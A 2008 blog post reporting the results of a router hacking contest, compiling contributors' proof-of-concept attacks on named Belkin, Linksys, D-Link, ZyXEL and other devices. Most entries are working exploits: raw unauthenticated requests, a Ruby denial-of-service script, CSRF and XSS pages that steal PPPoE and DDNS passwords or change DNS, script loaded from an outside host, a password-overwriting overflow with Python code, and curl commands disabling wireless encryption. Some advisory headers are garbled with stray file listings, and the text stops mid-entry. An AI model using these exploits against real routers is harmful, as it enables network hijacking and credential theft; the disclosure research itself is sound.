The Router Hacking Contest Results.
Publicated on :
1204375794
Abstract
The software on routers is a relatively unexplored area. With this in mind, it is no surprise that with our combined knowledge of network security and webapplication security, a further exploration of this landscape was only a matter of time. It is easy to understand that routers are already exploited by so called drive-by malware, because if you own the traffic originating source you can perform almost any command at will. The security landscape always changes, from the network to webapplication. This time it will shift between the best of both worlds. While the net becomes richer in technology, so will the attack vectors. Three weeks ago I launched a joined challenge with Gnucitizen to give readers a chance to join and inspect and hack their own router. It has been a unique contest that sparked the attention by many. 1st of March and all submissions are in and I'm very excited about the results and the exploits that are released. This research is important because it gives us an overview of the kind of vulnerabilities that exists within routers and other embedded devices.
Hacking Routers
The main problem with many routers is the authentication. As known, most routers come with default login credentials. This was not our field of research, because that is very well known fact. We wanted to see if there are other ways of attacking a router. Looking at the exploits, it is clear that authentication isn't always mandatory. If it is, we still could use CSRF and Javascript to do it for us. CSRF is almost undeniable the most dangerous method you can imagine to access a router remotely. The problem with this, is that routers usually do not utilize unique session tokens. But it can be far worse, if Javascript injection is possible e.g. XSS in the router, even proper tokens could fail. When both are possible, it will render all security useless for the router. It is important to understand that many attacks can be launched in stealth, which makes it a serious issue to be concerned with.
Conclusion.
A key thing to notice is that the use of web application based attack vectors can literally own the network. With Javascript and CSRF as our tools it is possible to smash your network security, your firewalls, your switches and your AV software or any other network based protection measure. If you are into network security and don't have much knowledge about web application hacking and security, it is time to start reading up on it. Overall it is time to accept that security isn't solely network based anymore. The vectors below are listed and gathered from various resources where the contest held place. Some are already acknowledged by the vendors, but the gross of them are zero-days and if you own a router that is listed below, you might want to consult a security expert in order to secure your router. The submissions proved to us once again that Javascript is the main culprit and that CSRF is fatal. It has the capacity to shut down your router or re-configuring it without your knowledge or consent. Poisoning your DNS settings, re-routing traffic, tampering the DMZ, sniffing traffic and can bypass an expensive firewall or AV. Another interesting analysis is that router vendors are oblivious to contemporary hacks. Applications that utilize Javascript or a CSRF attack scheme are smart, and mainly overlooked by many.
The contest
I promised to choose a winner, and believe me that was hard. Because all routers are unique in each way. Mario's VOIP hack was a very impressive one and Gnucitizen posted a whole blog item about that submission [1]. Meathive's submissions are genuinely impressive as well due to the extensive new finds on his router, and Kender joined in with some neat research on how to reverse engineer a router configuration backup file [2]. If I must select a winner that will get my vote it will be: Meathive. Kender will be sharing a second place with Mario because of the exclusiveness and creativity to anticipate on hacking embedded devices. Congratulations to the winners! and of course all the folks who participated and gave it media attention. You made this contest possible in the first place. The challenge might be over, but you can still join us by submitting your findings at the gnucitizen project page [x].
References
[1]
http://www.gnucitizen.org/projects/total-surveillance-made-easy-with-voip-phones/
[2]
http://www.mindmasters.nl/kender/zyxel/
[x]
http://www.gnucitizen.org/projects/router-hacking-challenge/
Router issues.
PDP summarized a list that affects routers:
authentication bypass
a-to-c attacks
csrf (cross-site request forgeries)
xss (cross-site scripting)
call-jacking
obfuscation/encryption deficiencies
UPnP, DHCP and mDNS problems
SNMP injection attacks due to poor SNMP creds.
memory overwrites
stealing config files
cross-file upload attacks
remote war-driving
factory restore attacks
information disclosure
etc, etc, etc
The submissions.
@author: loftgaia
@Router model:F5D7230-4
@Manufacturer:Belkin
I have found a weakness in the way this router maintains access to the control panel.
After a user enters the password successfully in the control center,
the router maintains access just by checking the ipaddress.
Lets suppose i have two computers in my LAN:
PC1-192.168.2.3
PC2-192.168.2.5
I login to the control panel of the router with PC1.
With PC2 i just need to change my IP address: ifconfig eth0 192.168.2.3
and then i can change any settings in the router with PC2:
DNS settings,firewall rules,ip forwarding,etc.
@author:loftgaia
@Router model:F5D7230-4
@Manufacturer:Belkin
I now have managed to change router configuration options without even logging in.
If I try to access the html pages of the router it will ask for a password,
but not the script that handles the request itself.
So we just need to replay the http packets that actually perform the action.
*No* authentication or spoofing is required.
HTTP headers:
POST /cgi-bin/setup_dns.exe
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://192.168.2.1/setup_dns.stm
Content-Type: application/x-www-form-urlencoded
Content-Length: 94
HTTP body:
page=setup_dns&logout=&dns1_1=1&dns1_2=1&dns1_3=1&dns1_4=1&dns2_1=2&dns2_2=2&dns2_3=2&dns2_4=2
After sending this the primary DNS server IP-address will get changed to 1.1.1.1 and secondary DNS server to 2.2.2.2 .
I have tried changing other options without password and it worked all the time,disable firewall,reset to factory defaults,etc. The page will still ask for a password, too bad the script didn't.
This can obviously be triggered remotely for at least a couple of ways.
Tomorrow i will be buying a new router.
@author:loftgaia
@Router model:F5D7230-4
@Manufacturer:Belkin
Found another one. This time it only causes a DOS.
http://d2.myfreefilehosting.com/d1/panel_dos.rb
#!/usr/bin/env ruby
#Author:loftgaia
#Router: Belkin Wireless G Router F5D7230-4
#After running this script nobody in the LAN
#will be able to connect to the router control center.
#A router restart is required to resume normal operation.
#Internet traffic is still allowed to pass through ,this only causes a
#DOS on the control center.
#If we send a POST request with a Keep-Alive
#header plus some random content in the body and
#immediately close the socket,any connections to
#the control center, from that point on are just
#dropped by the router from *any* source.
require 'socket'
sock = TCPSocket.new('192.168.2.1',80)
request = <<EOF
POST /cgi-bin/setup_virtualserver.exe HTTP/1.1
Host: 192.168.2.1
Keep-Alive: 50
Connection: Keep-Alive
Content-Type: text/plain
Content-Length: 10
ansdfert=1
EOF
request.gsub!('','')
puts sock.write(request).to_s + ' written '
sock.close
@authour: dzman
@Router model: WRT300N Firmware Version: 2.00.20
@Manufacturer: LinkSys
I've had some fun with my router: LinkSys WRT300N Firmware Version: 2.00.20
Basically it uses XSS, the user does need to be logged into the admin area of the router for this to work. This will fetch the username/password of my PPPoE login, but with small modifications you can steal/adjust anything you want. Does not work in IE, probably some small problem but I don't use IE so whatever. Firefox and Safari are ok.
Html file:
<iframe name='inp' style='display:none'></iframe>
<form method='post' action='http://192.168.1.1' target='inp'>
<input type='hidden' name='ddns' value='ddnsorg'>
<input type='hidden' name='dyndns_user' value='user'>
<input type='hidden' name='dyndns_pw' value='pass'>
<input type='hidden' name='dyndns_domain' value=''<
script src=http://localhost/router.js></script>'>
<input type='hidden' name='ddns_mode' value='Dynamic'>
<input type='hidden' name='ddns_backup' value='disable'>
<input type='hidden' name='ddns_wildcard' value='disable'>
<input type='hidden' name='Static' value='Update'>
<input type='hidden' name='tzo_user' value=''>
<input type='hidden' name='tzo_pw' value=''>
<input type='hidden' name='tzo_domain' value=''>
<input type='hidden' name='h_ddns' value='ddnsorg'>
<input type='hidden' name='h_ddns_mode' value='Dynamic'>
<input type='hidden' name='h_ddns_backup' value='disable'>
<input type='hidden' name='h_ddns_wildcard' value='disable'>
<input type='hidden' name='todo' value='connect_ddns'>
<input type='hidden' name='this_file' value='Setup_DDNS.htm'>
<input type='hidden' name='next_file' value='Setup_DDNS.htm'>
<input type='hidden' name='message' value=''>
</form>
<script type='text/javascript'>
window.onload = function() {
document.forms[0].submit();
}
</script>
Javascript file:
<script>
var ss = document.createElement('iframe');
ss.src = '/setup.cgi?next_file=Setup.htm';
ss.setAttribute('onload', 'test()');
var hh = document.getElementsByTagName('body')[0];
hh.appendChild(ss);
function test() {
var oDoc = (ss.contentWindow || ss.contentDocument);
if (oDoc.document) oDoc = oDoc.document;
var d = ss.contentDocument;
var user = d.getElementsByName('PppoeUserName')[0].value;
var pass = d.getElementsByName('PppoePasswd')[0].value;
alert(user + '-' + pass);
}
</script>
@author: .mario
@Router type: none, VOIP system.
@manufacturer: Snom
There's a VoIP solution called Snom 320 - more info on that beast here:[www.snom.com] It comes with a central phone server which features a web front-end. This thing can't be password protected - I don't know why but it just is that way. there's an input field labeled 'Call a number' - and this is done via regular POST - no JS, no token - nothing. So - if you manage to get someone with this thing in his intranet to visit a prepared site of yours you can make his phone do loads of calls to everywhere in the world.
[update]
If you let the victim call yourself and you answer the phone you can hear the victim talk without knowing that you are listening. Well done, Snom :)
[/update]
But - you might say - the victim will notice when watching his logs! Nope - he won't. The logging application a a Flash file called snomControl.swf. If you call let's say 100 numbers in a place really far away you just have to make sure the last number you call is - tada:
"');
After that all other numbers that have ever been called aren't visible in the log anymore since the Flash app kind of crashes internally, and only shows the calls made after the above mentioned one. I was too lazy to decompile it - maybe later. So - CSRF all over the place but isn't it boring to just get the user to make calls when he visits your prepared site? Yes - it is! You can CSRF a nice persistent XSS into the address book. So anytime the user visits it you can execute your script and do other stuff - like data mining, more calls, even some more calls and so on.
There is XSS which also enables you to XHR yourself through the whole front-end and change arbitrary settings, like display names on the phone display,
read out settings and anything else you want. Might be bad if you call your boss and some f-words appear on his display. Well, that's it for now - as said I dunno if this really counts but I consider it a funny find anyway ;)
@author: mutax
@Router type: Speedport W500 DSL-Router
@Manufacturer: Deutsche Telekom
bash one-liner for the Deutsche Telekom Speedport W500 DSL-Router (not the one running linux) to get the logon
password from the - well - login-page:
wget -q -O - 10.1.1.1/b_banner.stm | sed -n "s/^pwd = '(.*)';/your routers password: 1/p"
your routers password: xxxx
That router seems to be a bug itself ;)
mutax
@author: Gareth Heyes
@Router type: DSL-G604T
@Manufacturer: DLink
I finally sat down and wrote a POC for my router, it's a DLink DSL-G604T. It's probably going in the bin after this :) I can read any file on the router remotely and the entire thing can be CSRF'd to death. In the sample code I show how to read the config file (or any other file) and change the DNS settings to anything you like.
<html>
<head>
<title>DLink DSL-G604T Exploit</title>
<script>
function readConfig() {
login();
setTimeout(function() {
xss(''><iframe src='http://192.168.1.1/cgi-bin/webcm?getpage=/etc/config.xml' onload='
alert(this.contentWindow.document.body.innerHTML);'>');
}, 2000);
}
function xss(payload) {
ifrm = document.getElementById('iframe');
ifrm.contentWindow.location = 'http://192.168.1.1/cgi-bin/webcm?getpage=../html/advanced/portforw.htm&
var:pagename=fwan&var:category='+payload;
}
function login() {
var f = document.createElement('form');
f.action = 'http://192.168.1.1/cgi-bin/webcm';
f.innerHTML = '<input type='hidden'name='getpage'value='../html/home.htm'><input type='hidden'
name='errorpage' value='../html/index.html'>';
f.innerHTML += '<input type='hidden'
name='login:command/username' value='admin'><input type='hidden'
name='login:command/password' value='admin'>';
f.innerHTML += '<input type='hidden'
name='var:errormsg' value='Error'>';
f.target = 'iframe';
f.method = 'post';
document.body.appendChild(f);
f.submit();
}
function post(url, fields) {
var p = document.createElement('form');
p.action = url;
p.innerHTML = fields;
p.target = 'iframe';
p.method = 'post';
document.body.appendChild(p);
p.submit();
}
function changeDNS(server) {
login();
setTimeout(function() {
var fields = '<input type='hidden' name='getpage'
value='../html/setup/dns.htm'>';
fields += '<input type='hidden'
name='resolver:settings/nameserver1'
value=''+server+''>';
fields += '<input type='hidden'
name='resolver:settings/nameserver2'
value=''+server+''>';
fields += '<input type='hidden'
name='dproxy:settings/state'
value='2'>';
post('http://192.168.1.1/cgi-bin/webcm',fields);
}, 2000);
setTimeout(function() {
post('http://192.168.1.1/cgi-bin/webcm','<input type='hidden' name='logic:command/save'
value='../html/tools/syscommnd.htm'>');
},5000);
}
window.onload = function() {
//readConfig();
changeDNS('2.2.2.2');
}
</script>
</head>
<body>
<iframe name='iframe' id='iframe'></iframe>
</body>
</html>
@author: beford
@Router type: P-660HW Series
@Manufacturer: ZyXEL
I'm using a ZyXEL P-660HW Series [www.zyxel.com] . There are a lot of CSRF stuff on this router, it can be used to change DNS servers, add keywords to bannedlist on URL, it's also affected by the IP-based session management attacks mentioned on gnucitizen, and to authenticate you only need a password, which by default is 'admin', I created two simple proof of concepts abusing a XSS flaw which requires the user to be logued on.
hxtp://192.168.1.1/Forms/DiagGeneral_2?PingIPAddr=d=<script src=http://beford.org/stuff/r1.js></script>
hxtp://192.168.1.1/Forms/DiagGeneral_2?PingIPAddr=d=<script src=http://beford.org/stuff/r2.js></script>
Javascript source code, and two screenshots for reference:
src: http://beford.org/stuff/r1.js
shot: http://beford.org/stuff/img/r1.png
function x() { if (window.XMLHttpRequest) return new XMLHttpRequest();
else return new ActiveXObject('Microsoft.XMLHTTP');}
function regexftw() {
if (z.readyState == 4) {
zx= /<td>([w.]{4,300})</font>/g;
var result, hm='';
while((result = zx.exec(z.responseText)) != null) {
if (hm.search(result[1])==-1)
hm='<li>' + result[1]+'</li>'+hm;
}
document.body.innerHTML=('You have recently visited: <br> <ul>'+hm+'</ul>');
}
}
z=x();
z.open('GET', '/ViewLog.html', true);
z.onreadystatechange = regexftw;
z.send(null);
src: http://beford.org/stuff/r2.js
shot: http://beford.org/stuff/img/r2.png
function x() { if (window.XMLHttpRequest) return new XMLHttpRequest();
else return new ActiveXObject('Microsoft.XMLHTTP');}
function regexftw() {
if (z.readyState == 4) {
zx= /NAME='sysDNSHost' SIZE='32' MAXLENGTH='71'
VALUE='([w.]+)'/;
if ((m = zx.exec(z.responseText)) != null) {
sysDNSHost= m[1];
zx = /NAME='sysDNSEmail' SIZE='32' MAXLENGTH='63'
VALUE='([a-zA-Z0-9_.-]+@[a-zA-Z0-9-]+.+[a-zA-Z0-9]{2,4})'/;
m = zx.exec(z.responseText);
sysDNSEmail = m[1];
zx = /NAME='sysDNSUser' SIZE='32' MAXLENGTH='31'
VALUE='([w.]+)'/;
m = zx.exec(z.responseText);
sysDNSUser = m[1];
zx = /NAME='sysDNSPassword' SIZE='32' MAXLENGTH='31'
VALUE='([w.]+)'/;
m = zx.exec(z.responseText);
sysDNSPassword = m[1];
alert('Host: '+sysDNSHost+'
Email: '+sysDNSEmail+'
User: '+sysDNSUser+'
Password: '+sysDNSPassword);
}
}
}
z=x();
z.open('GET', '/rpDyDNS.html', true);
z.onreadystatechange = regexftw;
z.send(null);
@author: Jonas
@Router type: DI604
@Manufacturer: DLINK
I'm using a DLINK-DI604 router which is surely one of the most popular ones here where i live.
The first thing i tried resulted in an XSS:
http://192.168.0.1/prim.htm?rc=_&rf='>alert(1)
http://pastebin.com/m5ad456b3
http://192.168.0.1/prim.htm?rc=_&rf='><script>alert(1)</script>
@author: kender
@Router type: P-2602HW-D1A
@Manufacturer: Zyxel
Description: All-in-one ADSL2+ VoIP IAD for SOHO
Firmware: V3.40(AJZ.1)
Default IP: 192.168.1.254
Once you log in your IP is whitelisted for 5 minutes (default value, see below). There is no CSRF protection.Examples:
http://192.168.1.254/Forms/RemMagWWW_1?serverWebPort=80&WWWAccessInterface=00000000
will open up the admin web interface to the internet.
http://192.168.1.254/Forms/rpSysAdmin_1?StdioTimout=0
will set the IP whitelisting timeout to unlimited.
When someone is logged in to the interface, requesting an admin url from a different IP in the LAN produces a message stating that the object is Protected. When no-one is logged in you get the login page. Thus it is possible to tell when someone is logged in.
Protection:
- Set the Maintenance > System > General > Administrator Inactivity Timer very low.
- Make sure you do not access any web resource while administering the device and for x minutes afterwards.
@author:nexact
@Router type: WiMax ProST
@Manufacturer: Airspan
Hardware Rev: 4.1
Software Ver: 6.5.38.0
Picture: http://tinyurl.com/32vloa
VulnType: Authentication bypass
There's not a lot of options to configure in this antenna but actually it's possible to 'scrap' the antenna by sending a corrupted firmware or you could simply bind it to another WiMax base station. How to exploit it ? Pretty simple, once you successfully log into the administration panel, it popups a webpage with all settings and a POST forms. Each settings is then accessed by sending a POST request to /process_adv/. The problem is that /process_adv/* is not validating if an user is authenticated.. so an attacker can access any options by forging a POST request. I've used BurpProxy to find out this one, kinda easy.. Setup your IE proxy to localhost:8080 and run BurpProxy, make any type of http request to your antenna and change the request :
POST /process_adv/ HTTP/1.1
Host: 10.0.0.1
Keep-Alive: 300
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
DialogText=&Advanced=1
I'm currently debugging the firmware to find out if password is stocked in cleartext in the EEPROM. and maybe..
there's a backdoor in it ? :-) Port 23 is open and it runs VxWorks.
@author: diesl0w
@Router type: DWL 2100AP
@Manufacturer: D-Link
There is a configuration disclosure on the D-Link DWL 2100AP that allows for the configuration to be downloaded via web browser. Making a regular request to any file with the .cfg as an extension: http:///config.cfg. This will give the AP's configuration including admin passwords, encrypted key, allowed MAC's, etc.
Part of the configuration disclosed is below:
# Copyright (c) 2002 Atheros Communications, Inc., All Rights Reserved
# DO NOT EDIT -- This configuration file is automatically generated
magic Ar52xxAP
fwc: 154
login admin
DHCPServer
Eth_Acl
nameaddr 0.0.0.0
domainsuffix
IP_Addr 10.10.10.166
IP_Mask 255.255.255.0
Gateway_Addr 10.10.10.1
RADIUSaddr
RADIUSport 1812
RADIUSsecret
password ##EDITED##
passphrase
wlan1 passphrase ##EDITED##
passphraseKey 00000000000000000000000000000000000000000000000000000000000000000000000000000000
wlan1 passphraseKey 1b911ae850d9ce61053b0d03ca901f593a776fd514dfc31313506f419a998feadc6fad570a57e58f
version 2
rbcnt 86
I disclosed a doc and video of this sometime last year so its not brand new but still interesting!
@author:kender
@Router type: P-2602HW-D1A
@Manufacturer: ZyXEL
For the Router Hacking Challenge Adrian Pastor was wondering if anyone knew how to read the configuration backup file
that you can download from your ZyXEL router.
I happen to have a ZyXEL gateway as well, a P-2602HW-D1A to be precise, so I decided to take a look.
After looking at several of these files (called 'rom-0' when downloaded) I came up with the following structure:
There's two blocks in my file, one for memory and one for files I guess.
They start at 0x00000000 and 0x00002000 respectively and look like this:
BYTE blocknumber
BYTE unknown
WORD nr of objects
DWORD blockLength
foreach object:
CHAR[14] objectname
DWORD uncompressed size
DWORD compressed size
DWORD offset to data from start of block
And there we encounter our first problem: the files can be compressed. For me the first block mentioned a 'dbgarea',
and the second block 'boot', 'spt.dat' and 'autoexec.net'. But only the spt.dat seems to be compressed.
Since the other files show little of interest this is also the file we're interested in.
Now to figure out the type of compression..
The first 32 bytes of my file look like this:
CE ED DB DB 00 03 00 09 00 00 06 84 08 00 00 ED 67 3B 5B 6D B0 00 0C 00 09 00 00 00 C8 4C 20 00
At first I had a hunch it might be LZW compression because that is often used in embedded devices,
but I could not make it work on the data I had. Google also turned up nothing useful for me.
So I decided to reverse engineer the firmware for my device to find the routines that read and write the spt.dat file.
I'm not going to go into the reversing itself today, but all I needed was this site and IDA Pro 5.1
From the disassembly I managed to figure out this structure for the spt.dat file:
DWORD Unclear (Load-addres?, Magic?, Endianness?)
WORD Major Version
WORD Minor version
DWORD Unclear (Chunks?)
until EOF:
WORD org_size
WORD raw_size
BYTE[raw_size] Compressed data
The decompression routines were a bit too big and complicated for me to follow since I'm no star at MIPS processors.
But I did find reference to files called 'lzsc.c' and 'lzsd.c'.
A quick google led me to the Stac LZS compression mechanism decribed at ANSI X3.241-1994
I could not quickly find an implementation or tool to now decompress the spt.dat
so I went ahead and started writing my own implementation in C#:
http://www.mindmasters.nl/kender/zyxel/configreader.zip
It still has some bugs in it so the decompression is not perfect, but it is good enough to read all settings like passwords,
snmp community strings, wep keys etc.
@author: Ronald van den Heetkamp
@Router type: Prestige series.
@Manufacturer: ZyXEL.
Abstract:
The router range has multiple CSRF issues, but no apparent XSS holes to mention. Exploiting the router requires the admin to be logged into his router. If we can achieve this, it would be possible to change ALL settings automagically. The below CSRF example grants remote TELNET access. Which could be used to attack the admin's system further.
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html>
<head></head>
<body>
<FORM METHOD='POST' ACTION='http://192.168.1.xxx/Forms/rpRManage_1' name='RMCform'>
<input name='serverTelnetAccess' value='00000000'>
<INPUT TYPE='TEXT' NAME='serverTelnetPort' value='23'>
<INPUT TYPE='TEXT' NAME='serverTelnetClientIP' VALUE='192.168.1.2'>
<input NAME='serverFtpAccess' VALUE='00000000'>
<INPUT TYPE='TEXT' NAME='serverFtpPort' VALUE='21'>
<INPUT TYPE='TEXT' NAME='serverFtpClientIP' VALUE='192.168.1.2'>
<input NAME='serverWebAccess' VALUE='00000000'>
<INPUT TYPE='TEXT' NAME='serverWebPort' VALUE='80'>
<INPUT TYPE='TEXT' NAME='serverWebClientIP' VALUE='0.0.0.0'>
<INPUT TYPE='SUBMIT' NAME='RManagesubmit1' VALUE='Apply'>
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
@author:ikki
@Router type: Boa/0.93.15 (with Intersil Extensions) based systems (i.e. FreeLan 802.11g Wireless Access
@Manufacturer: Boa/0.93.15 (with Intersil Extensions) based systems (i.e. FreeLan 802.11g Wireless Access
Secure Network - Security Research Advisory
Vuln name: HTTP Basic Authentication Bypass
Systems affected: Boa/0.93.15 (with Intersil Extensions) based systems (i.e. FreeLan 802.11g Wireless Access
Point (RO80211G-AP))
Severity: High
Local/Remote: Remote
Vendor URL: http://www.boa.org - http://isl3893.sourceforge.net - http://www.roper-europe.com
Author(s): Luca 'ikki' Carettoni - luca.carettoni@securenetwork.it, Claudio 'paper' Merloni -
claudio.merloni@securenetwork.it
Vendor disclosure: 24th August 2007
Vendor acknowledged: -
Vendor patch release: -
Public disclosure: 10th September 2007
Advisory number: SN-2007-02
Advisory URL: http://www.securenetwork.it/advisories/
#index.html# 0x000000.js 0x000000.txt 0x000001.js 0x000002.js 0x000003.js 0x000004.js 0x000005.js 0x000006.js 0x000007.js 0x000008.js 0x000009.js 0x00000A.js all.back all.html all.txt anal articles articles_old crowl.html index.html jquery-1.3.2.min.js split.sh while SUMMARY ***
Boa is a single-tasking HTTP server. That means that, unlike traditional web servers, it does not fork for each incoming connection, nor does it fork many copies of itself to handle multiple connections. Boa is very low on hardware usage and is therefore used on many embedded systems, including routers, wireless access points and portable devices. The Intersil isl3893 is an arm9 System On Chip for wireless access points. The goal of the project is to make an embedded distribution built around uclibc and uclinux. It is possible to overwrite the 'admin' password in memory, thus allowing an attacker to gain access to the web interface and alter configuration parameters. This vulnerability can be combined with another known vulnerability (CVE-2000-0920) to read arbitrary files from the device filesystem.
It's important to notice that Boa httpd doesn't have any authentication code built in; the flaw is inside the Intersil extensions but we can't confirm it because no source code is released.
#index.html# 0x000000.js 0x000000.txt 0x000001.js 0x000002.js 0x000003.js 0x000004.js 0x000005.js 0x000006.js 0x000007.js 0x000008.js 0x000009.js 0x00000A.js all.back all.html all.txt anal articles articles_old crowl.html index.html jquery-1.3.2.min.js split.sh while VULNERABILITY DETAILS ***
When asked for HTTP basic authentication credentials, it is possible to fill up the stack memory of the boa process passing a string longer than 127 characters as username. In that situation the string passed as password will overwrite the current in memory value of the admin password, thus enabling the attacker to reset it to a known value. Once reset the password, the attacker has of course access to the configuration panel.
As an example, the password can be set to 'owned' sending the following request to the web server:
GET / HTTP/1.1
Host: 192.168.0.1
Authorization: Basic
YWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFh
YWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFh
YWFhYWFhYWFhYWFhYTpvd25lZA==
The basic authorization header parameter contains the base64/mime encoded string
'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:owned'
#index.html# 0x000000.js 0x000000.txt 0x000001.js 0x000002.js 0x000003.js 0x000004.js 0x000005.js 0x000006.js 0x000007.js 0x000008.js 0x000009.js 0x00000A.js all.back all.html all.txt anal articles articles_old crowl.html index.html jquery-1.3.2.min.js split.sh while EXPLOIT ***
The vulnerability can exploited through simple HTTP request, i.e. using a common web browser (using the authentication credential specified above).
The following snippet of python code can be used to reproduce the issue:
###### CUT HERE ######
#!/usr/bin/env python
import urllib2
SERVER_IP_ADDRESS = '192.168.0.1'
USERNAME =
'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
NEW_PASSWORD = 'owned'
auth_handler = urllib2.HTTPBasicAuthHandler()
auth_handler.add_password('LOGIN(default username & password is admin)', SERVER_IP_ADDRESS, USERNAME,
NEW_PASSWORD);
opener = urllib2.build_opener(auth_handler)
urllib2.install_opener(opener)
res = urllib2.urlopen('http://'+SERVER_IP_ADDRESS+'/home/index.shtml')
###### CUT HERE ######
#index.html# 0x000000.js 0x000000.txt 0x000001.js 0x000002.js 0x000003.js 0x000004.js 0x000005.js 0x000006.js 0x000007.js 0x000008.js 0x000009.js 0x00000A.js all.back all.html all.txt anal articles articles_old crowl.html index.html jquery-1.3.2.min.js split.sh while FIX INFORMATION ***
N/A
#index.html# 0x000000.js 0x000000.txt 0x000001.js 0x000002.js 0x000003.js 0x000004.js 0x000005.js 0x000006.js 0x000007.js 0x000008.js 0x000009.js 0x00000A.js all.back all.html all.txt anal articles articles_old crowl.html index.html jquery-1.3.2.min.js split.sh while WORKAROUNDS ***
N/A
#index.html# 0x000000.js 0x000000.txt 0x000001.js 0x000002.js 0x000003.js 0x000004.js 0x000005.js 0x000006.js 0x000007.js 0x000008.js 0x000009.js 0x00000A.js all.back all.html all.txt anal articles articles_old crowl.html index.html jquery-1.3.2.min.js split.sh while CONTACT ***
E-mail: securenetwork[at]securenetwork.it
GPG/PGP key: http://www.securenetwork.it/pgpkeys/Secure Network.asc
Phone: +39 0363 560 404
@author: meathive
@Router type: WRT54G firmware version: v1.00.9
@Manufacturer: Linksys
url: kinqpinz.info ;]
Tue, 05 Feb 2008 07:51:41 -0700
############################################################################
WRT54G firmware version: v1.00.9
Default LAN IP: 192.168.1.1
Default auth: user:blank - pass:admin
Authorization: Basic OmFkbWlu
php > print base64_decode('OmFkbWlu');
:admin
############################################################################
/******************************
#index.html# 0x000000.js 0x000000.txt 0x000001.js 0x000002.js 0x000003.js 0x000004.js 0x000005.js 0x000006.js 0x000007.js 0x000008.js 0x000009.js 0x00000A.js all.back all.html all.txt anal articles articles_old crowl.html index.html jquery-1.3.2.min.js split.sh while No Authentication Required! *
******************************/
############################################################################
What:
restore basic setup options to default.
Where:
http://192.168.1.1/Basic.tri?dhcp_end=149&oldMtu=1500&oldLanSubnet=0&OldWanMode=0&SDHCP1=192&SDHCP2=168&SDHCP3=1&
SDHCP4=100&EDHCP1=192&EDHCP2=168&EDHCP3=1&EDHCP4=150&pd=&now_proto=dhcp&old_domain=&chg_lanip=192.168.1.1&_daylig
ht_time=1&wan_proto=0&router_name=WRT54G&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168
&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=0&lan_proto=Enable&dhcp_start=100&dhcp_num=50&dhcp_lease=0&dns0_0=0
&dns0_1=0&dns0_2=0&dns0_3=0&dns1_0=0&dns1_1=0&dns1_2=0&dns1_3=0&dns2_0=0&dns2_1=0&dns2_2=0&dns2_3=0
&wins_0=0&wins_1=0&wins_2=0&wins_3=0&time_zone=%28GMT-08%3A00%29+Pacific+Time+%28USA+%26+Canada%29
&daylight_time=ON&layout=en
How:
curl -d
'dhcp_end=149&oldMtu=1500&oldLanSubnet=0&OldWanMode=0&SDHCP1=192&SDHCP2=168&SDHCP3=1&SDHCP4=100&EDHCP1=192
&EDHCP2=168&EDHCP3=1&EDHCP4=150&pd=&now_proto=dhcp&old_domain=&chg_lanip=192.168.1.1&_daylight_time=1&
wan_proto=0&router_name=WRT54G&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1
&lan_ipaddr_3=1&lan_netmask=0&lan_proto=Enable&dhcp_start=100&dhcp_num=50&dhcp_lease=0&dns0_0=0&dns0_1=0
&dns0_2=0&dns0_3=0&dns1_0=0&dns1_1=0&dns1_2=0&dns1_3=0&dns2_0=0&dns2_1=0&dns2_2=0&dns2_3=0&wins_0=0
&wins_1=0&wins_2=0&wins_3=0&time_zone=%28GMT-08%3A00%29+Pacific+Time+%28USA+%26+Canada%29&daylight_time=ON&layout=en'
http://192.168.1.1/Basic.tri
############################################################################
What:
reset administrative password to 'asdf'.
Where:
http://192.168.1.1/manage.tri?remote_mgt_https=0&http_enable=1&https_enable=0&PasswdModify=1&http_passwd=asdf&
http_passwdConfirm=asdf&_http_enable=1&web_wl_filter=1&remote_management=0&upnp_enable=1&layout=en
How:
curl -d
'remote_mgt_https=0&http_enable=1&https_enable=0&PasswdModify=1&
http_passwd=asdf&http_passwdConfirm=asdf&_http_enable=1&web_wl_filter=1
&remote_management=0&upnp_enable=1&layout=en' http://192.168.1.1/manage.tri
############################################################################
What:
enable mixed wireless network mode with SSID 'pwnage' on channel 6, SSID broadcasting enabled.
Where:
http://192.168.1.1/WBasic.tri?submit_type=&channelno=11&OldWirelessMode=3&Mode=3&SSID=pwnage&channel=6
&Freq=6&wl_closed=1&sesMode=1&layout=en
How:
curl -d
'submit_type=&channelno=11&OldWirelessMode=3&Mode=3&SSID=pwnage&channel=6&Freq=6&wl_closed=1
&sesMode=1&layout=en' http://192.168.1.1/WBasic.tri
############################################################################
What:
disable all wireless encryption.
Where:
http://192.168.1.1/Security.tri?SecurityMode=0&layout=en
How:
curl -d 'SecurityMode=0&layout=en' http://192.168.1.1/Security.tri
############################################################################
What:
disable wireless MAC filtering.
Where:
http://192.168.1.1/WFilter.tri?wl_macmode1=0
How:
curl -d 'wl_macmode1=0' http://192.168.1.1/WFilter.tri
############################################################################
What:
enable DMZ to ip 192.168.1.100.
Where:
